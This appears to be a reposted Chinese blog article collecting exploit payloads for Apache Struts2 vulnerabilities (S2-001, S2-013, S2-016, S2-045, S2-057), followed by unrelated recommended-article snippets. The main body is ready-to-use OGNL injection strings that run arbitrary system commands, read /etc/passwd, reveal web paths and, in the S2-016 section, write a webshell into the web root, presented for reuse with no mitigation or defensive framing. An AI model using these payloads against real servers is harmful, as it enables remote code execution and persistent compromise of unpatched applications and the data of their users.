1. 全栈程序员必看首页

java struts2 漏洞_Struts2漏洞利用「建议收藏」

全栈程序员-站长 未分类 阅读 17

java struts2 漏洞_Struts2漏洞利用「建议收藏」Struts漏洞合集Struts-S2-013漏洞利用受影响版本Struts2.0.0-Struts2.3.14.1漏洞利用任意命令执行POC:${(#_memberAccess[“allowStaticMethodAccess”]=true,#a=@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream(),#b=newjava…

大家好,又见面了,我是你们的朋友全栈君。

Struts漏洞合集

Struts-S2-013漏洞利用

受影响版本

Struts 2.0.0 – Struts 2.3.14.1

漏洞利用

任意命令执行POC:

${(#_memberAccess[“allowStaticMethodAccess”]=true,#a=@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}

或着

${#_memberAccess[“allowStaticMethodAccess”]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())}

如:

http://your-ip:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘id’).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(‘dbapp%3D’%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

580fdc949fbe0f353949ec450283175a.png

Struts-S2-001漏洞利用

影响版本

Struts2.0.0 – Struts2.3.15

漏洞利用

获取tomcat执行路径:

%{“tomcatBinDir{“+@java.lang.System@getProperty(“user.dir”)+”}”}

8fbc66157c20d7ff373f7401d7d4ba7f.png

06abc8a7d184125aaea13569700505e7.png

获取Web路径:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter(),#response.println(#req.getRealPath(‘/’)),#response.flush(),#response.close()}

执行任意命令(命令加参数:new java.lang.String[]{“cat”,”/etc/passwd”}):

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{“pwd”})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

Struts-S2-016漏洞利用

影响版本

2.0.0 – 2.3.15

执行命令

redirect:${#context[“xwork.MethodAccessor.denyMethodExecution”]=false,#f=#_memberAccess.getClass().getDeclaredField(“allowStaticMethodAccess”),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec(“uname -a”).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}

1c0ed1f7e7d537b6f7b09db5b8cd6625.png

获取Web目录

redirect:${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter (),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(#req.getSession().getServletContext().getRealPath(‘/’)),#ot.flush(),#ot.close()}

26bff0474cec7da61399311a2ceb1413.png

写入Webshell

redirect:${#context[“xwork.MethodAccessor.denyMethodExecution”]=false,#f=#_memberAccess.getClass().getDeclaredField(“allowStaticMethodAccess”),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletRequest”),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath(“/”)).append(@java.io.File@separator).append(“1.jspx”).toString()),#b.write(#a.getParameter(“t”).getBytes()),#b.close(),#genxor=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”).getWriter(),#genxor.println(“BINGO”),#genxor.flush(),#genxor.close()}

0091a0f158418fcf56f20927e98a9d2a.png

Struts-S2-045漏洞利用

影响版本

Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10

POC

%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘vulhub’,233*233)}.multipart/form-data

643d8d82fdf98f9cd68097817c7e5630.png

EXP

%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’ls’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

3a784697be332e3d8595298b2e508c5b.png

Struts-S2-057漏洞利用

受影响版本

Struts 2.3 – 2.3.34

Struts 2.5 – 2.5.16

POC

$%7B233*233%7D

61e125c4155f7b6c849dddb66bed24aa.png

命令执行

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

7ceb0c41ba43cc64abaef2fe09372a2b.png

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/161684.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年7月19日 上午11:46
下一篇 2022年7月19日 下午12:00


相关推荐

  • 微信公众平台开发书籍推荐

    微信公众平台开发书籍推荐

    微信公众平台开发书籍推荐关键字 微信开发图书微信公众平台开发书籍微信图书微信开发书籍微信图书推荐微信开发图书推荐 nbsp 本文介绍了当前图书市场上最主要的微信公众平台开发类书籍 并对每本书的特色做了简要点评 供有需要购买的读者进行参考 下列书籍按使用顺序 分为 PHP Java C 三类 nbsp 以下是使用 PHP 做微信开发的图书推荐

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月19日
    1
  • 不含重复字符的最长子串长度JAVA_字符串回文判断

    不含重复字符的最长子串长度JAVA_字符串回文判断

    不含重复字符的最长子串长度JAVA_字符串回文判断给你一个二进制字符串 s ,现需要将其转化为一个 交替字符串 。请你计算并返回转化所需的 最小 字符交换次数,如果无法完成转化,返回 -1 。交替字符串 是指:相邻字符之间不存在相等情况的字符串。例如,字符串 “010” 和 “1010” 属于交替字符串,但 “0100” 不是。任意两个字符都可以进行交换,不必相邻 。示例 1:输入:s = “111000”输出:1解释:交换位置 1 和 4:”111000″ -> “101010” ,字符串变为交替字符串。示例 2:输入:s =

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月9日
    11
  • pycharm下的多个python版本共存(二)

    pycharm下的多个python版本共存(二)

    pycharm下的多个python版本共存(二)

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月22日
    54
  • matlab输出语句fprintf例子_matlab中compose函数

    matlab输出语句fprintf例子_matlab中compose函数

    matlab输出语句fprintf例子_matlab中compose函数golang需要什么基础?_后端开发golang需要的基础是:首先初学Go语言要弄懂基础语法和概念;然后掌握文件操作、网络编程、锁、协程、对象序列化和反序列化,以及各种数据格式的封装等;最后接触数据库等,就可以模块化开发。matlab中fprintf函数的用法详解:fprintf函数可以将数据按指定格式写入到文本文件中。其调用格式为:数据的格式化输出:fprintf(fid,format,v…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月31日
    4
  • 信息提取(Information Extraction)

    信息提取(Information Extraction)

    信息提取(Information Extraction)信息提取 IE 信息提取 IE 的目标是将文本信息转化为结构化信息 起初用于定位自然语言文档中的特定信息 属于自然语言处理的一个子领域 随着网页文本信息的急剧增长 越来越多的人投入到信息提取 IE 领域的研究 网页文本信息的非结构化特征和无序性 一般只能采用全文检索的方式查找 但是网页中充斥着大量的无关信息 比如广告和无关链接以及其他内容 有用信息和无用信息混杂在一起 给网页信息的检索问题带

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月19日
    2
  • endnote的参考文献格式怎么设置成和知网一致(endnote如何替换参考文献)

    endnote的参考文献格式怎么设置成和知网一致(endnote如何替换参考文献)

    1、先偷懒吧,到EndNote的主站搜索,看是否有你要的Journal格式;如果没有只有自己学啦。2、打开一个EndNote数据库/Edit/OutputStyles/Edit………意思是将你默认的参考文献格式进行修改,因为重新编写有些语法可能不太会。技巧,先从找一个参考文献和自己要求相似的格式。如没有经验,SCI格式是缩略格式,NeuroReport是完整格式(在中国比较流行的相似格式)。我就…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月16日
    354

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号